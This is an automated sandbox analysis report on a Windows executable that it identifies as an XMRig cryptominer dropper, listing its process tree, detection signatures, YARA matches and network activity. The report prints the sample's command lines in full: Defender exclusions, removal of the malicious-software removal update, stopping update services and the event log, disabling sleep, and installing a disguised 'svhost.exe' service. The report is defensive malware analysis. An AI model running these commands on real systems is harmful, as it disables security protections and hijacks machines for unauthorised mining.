Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
prog.exe

Overview

General Information

Sample name:prog.exe
Analysis ID:1542825
MD5:d3adc3ec7b76556b7fac591c33f31ea9
SHA1:b7295fae70f550aa2963da196b08636094e26e93
SHA256:25231ba6616c0c1bbc4dda82bdd46ad067577e16971bae412b1192b250b456dc
Tags:exeuser-aachum
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • prog.exe (PID: 5580 cmdline: "C:\Users\user\Desktop\prog.exe" MD5: D3ADC3EC7B76556B7FAC591C33F31EA9)
    • powershell.exe (PID: 3856 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 984 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1440 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 1020 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3032 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2104 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2284 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1492 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6128 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7124 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6208 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4072 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1632 cmdline: C:\Windows\system32\sc.exe delete "appdata" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2260 cmdline: C:\Windows\system32\sc.exe create "appdata" binpath= "C:\ProgramData\win32\svhost.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6204 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1968 cmdline: C:\Windows\system32\sc.exe start "appdata" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svhost.exe (PID: 1576 cmdline: C:\ProgramData\win32\svhost.exe MD5: D3ADC3EC7B76556B7FAC591C33F31EA9)
    • powershell.exe (PID: 2820 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6148 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 5500 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3608 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6972 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5136 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5800 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1524 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2680 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3448 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2992 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 4696 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5860 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION
      Process Memory Space: svchost.exe PID: 4696JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: svchost.exe PID: 4696MacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x6996e:$a1: mining.set_target
        • 0x66117:$a2: XMRIG_HOSTNAME
        • 0x66e8f:$a3: Usage: xmrig [OPTIONS]
        • 0x660f8:$a4: XMRIG_VERSION
        SourceRuleDescriptionAuthorStrings
        60.2.svchost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          60.2.svchost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x37ef98:$a1: mining.set_target
          • 0x371220:$a2: XMRIG_HOSTNAME
          • 0x373b48:$a3: Usage: xmrig [OPTIONS]
          • 0x3711f8:$a4: XMRIG_VERSION
          60.2.svchost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          60.2.svchost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3cd180:$s3: \\.\WinRing0_
          • 0x376148:$s4: pool_wallet
          • 0x3705f0:$s5: cryptonight
          • 0x370600:$s5: cryptonight
          • 0x370610:$s5: cryptonight
          • 0x370620:$s5: cryptonight
          • 0x370638:$s5: cryptonight
          • 0x370648:$s5: cryptonight
          • 0x370658:$s5: cryptonight
          • 0x370670:$s5: cryptonight
          • 0x370680:$s5: cryptonight
          • 0x370698:$s5: cryptonight
          • 0x3706b0:$s5: cryptonight
          • 0x3706c0:$s5: cryptonight
          • 0x3706d0:$s5: cryptonight
          • 0x3706e0:$s5: cryptonight
          • 0x3706f8:$s5: cryptonight
          • 0x370710:$s5: cryptonight
          • 0x370720:$s5: cryptonight
          • 0x370730:$s5: cryptonight

          Change of critical system settings

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\prog.exe", ParentImage: C:\Users\user\Desktop\prog.exe, ParentProcessId: 5580, ParentProcessName: prog.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6128, ProcessName: powercfg.exe

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\prog.exe", ParentImage: C:\Users\user\Desktop\prog.exe, ParentProcessId: 5580, ParentProcessName: prog.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3856, ProcessName: powershell.exe
          Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\win32\svhost.exe, ParentImage: C:\ProgramData\win32\svhost.exe, ParentProcessId: 1576, ParentProcessName: svhost.exe, ProcessCommandLine: svchost.exe, ProcessId: 4696, ProcessName: svchost.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\prog.exe", ParentImage: C:\Users\user\Desktop\prog.exe, ParentProcessId: 5580, ParentProcessName: prog.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3856, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\win32\svhost.exe, ParentImage: C:\ProgramData\win32\svhost.exe, ParentProcessId: 1576, ParentProcessName: svhost.exe, ProcessCommandLine: svchost.exe, ProcessId: 4696, ProcessName: svchost.exe
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "appdata" binpath= "C:\ProgramData\win32\svhost.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "appdata" binpath= "C:\ProgramData\win32\svhost.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\prog.exe", ParentImage: C:\Users\user\Desktop\prog.exe, ParentProcessId: 5580, ParentProcessName: prog.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "appdata" binpath= "C:\ProgramData\win32\svhost.exe" start= "auto", ProcessId: 2260, ProcessName: sc.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\prog.exe", ParentImage: C:\Users\user\Desktop\prog.exe, ParentProcessId: 5580, ParentProcessName: prog.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3856, ProcessName: powershell.exe
          Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\win32\svhost.exe, ParentImage: C:\ProgramData\win32\svhost.exe, ParentProcessId: 1576, ParentProcessName: svhost.exe, ProcessCommandLine: svchost.exe, ProcessId: 4696, ProcessName: svchost.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\prog.exe", ParentImage: C:\Users\user\Desktop\prog.exe, ParentProcessId: 5580, ParentProcessName: prog.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6204, ProcessName: sc.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-26T16:36:14.260707+020020362892Crypto Currency Mining Activity Detected192.168.2.5587501.1.1.153UDP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\ProgramData\win32\svhost.exeReversingLabs: Detection: 73%
          Source: prog.exeReversingLabs: Detection: 73%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability

          Bitcoin Miner

          barindex
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 60.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4696, type: MEMORYSTR
          Source: svchost.exe, 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exeString found in binary or memory: cryptonight-monerov7
          Source: svchost.exe, 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
          Source: svchost.exe, 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exe, 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: svchost.exe, 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: prog.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: svhost.exe, 00000023.00000003.2340216080.000002207FB50000.00000004.00000001.00020000.00000000.sdmp, pnhtlztmuvjx.sys.35.dr
          Source: Joe Sandbox ViewIP Address: 95.179.241.203 95.179.241.203
          Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.5:58750 -> 1.1.1.1:53
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
          Source: svhost.exe, 00000023.00000003.2340216080.000002207FB50000.00000004.00000001.00020000.00000000.sdmp, pnhtlztmuvjx.sys.35.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: svhost.exe, 00000023.00000003.2340216080.000002207FB50000.00000004.00000001.00020000.00000000.sdmp, pnhtlztmuvjx.sys.35.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: svhost.exe, 00000023.00000003.2340216080.000002207FB50000.00000004.00000001.00020000.00000000.sdmp, pnhtlztmuvjx.sys.35.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: svhost.exe, 00000023.00000003.2340216080.000002207FB50000.00000004.00000001.00020000.00000000.sdmp, pnhtlztmuvjx.sys.35.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: svchost.exe, 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
          Source: svchost.exe, 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443

          Operating System Destruction

          barindex
          Source: C:\ProgramData\win32\svhost.exeProcess information set: 01 00 00 00 Jump to behavior
          Source: C:\ProgramData\win32\svhost.exeProcess information set: 01 00 00 00 Jump to behavior

          System Summary

          barindex
          Source: 60.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 60.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 60.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 0000003C.00000002.3902418853.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 4696, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Users\user\Desktop\prog.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\prog.exeCode function: 0_2_00007FF6F1FB1394 NtCloseObjectAuditAlarm,0_2_00007FF6F1FB1394
          Source: C:\ProgramData\win32\svhost.exeCode function: 35_2_00007FF7E32F1394 NtAllocateUserPhysicalPagesEx,35_2_00007FF7E32F1394
          Source: C:\Windows\System32\conhost.exeCode function: 58_2_0000000140001394 NtPlugPlayControl,58_2_0000000140001394
          Source: C:\ProgramData\win32\svhost.exeFile created: C:\Windows\TEMP\pnhtlztmuvjx.sysJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_agef4gqi.jsx.ps1Jump to behavior
          Source: C:\Users\user\Desktop\prog.exeCode function: 0_2_00007FF6F1FB66280_2_00007FF6F1FB6628
          Source: C:\Users\user\Desktop\prog.exeCode function: 0_2_00007FF6F1FB66280_2_00007FF6F1FB6628
          Source: C:\ProgramData\win32\svhost.exeCode function: 35_2_00007FF7E32F662835_2_00007FF7E32F6628
          Source: C:\ProgramData\win32\svhost.exeCode function: 35_2_00007FF7E32F662835_2_00007FF7E32F6628
          Source: C:\Windows\System32\conhost.exeCode function: 58_2_000000014000315058_2_0000000140003150
          Source: C:\Windows\System32\conhost.exeCode function: 58_2_00000001400026E058_2_00000001400026E0
          Source: Joe Sandbox ViewDropped File: C:\ProgramData\win32\svhost.exe 25231BA6616C0C1BBC4DDA82BDD46AD067577E16971BAE412B1192B250B456DC
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\pnhtlztmuvjx.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\Users\user\Desktop\prog.exeCode function: String function: 00007FF6F1FB1394 appears 33 times
          Source: C:\ProgramData\win32\svhost.exeCode function: String function: 00007FF7E32F1394 appears 33 times
          Source: 60.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 60.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 60.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
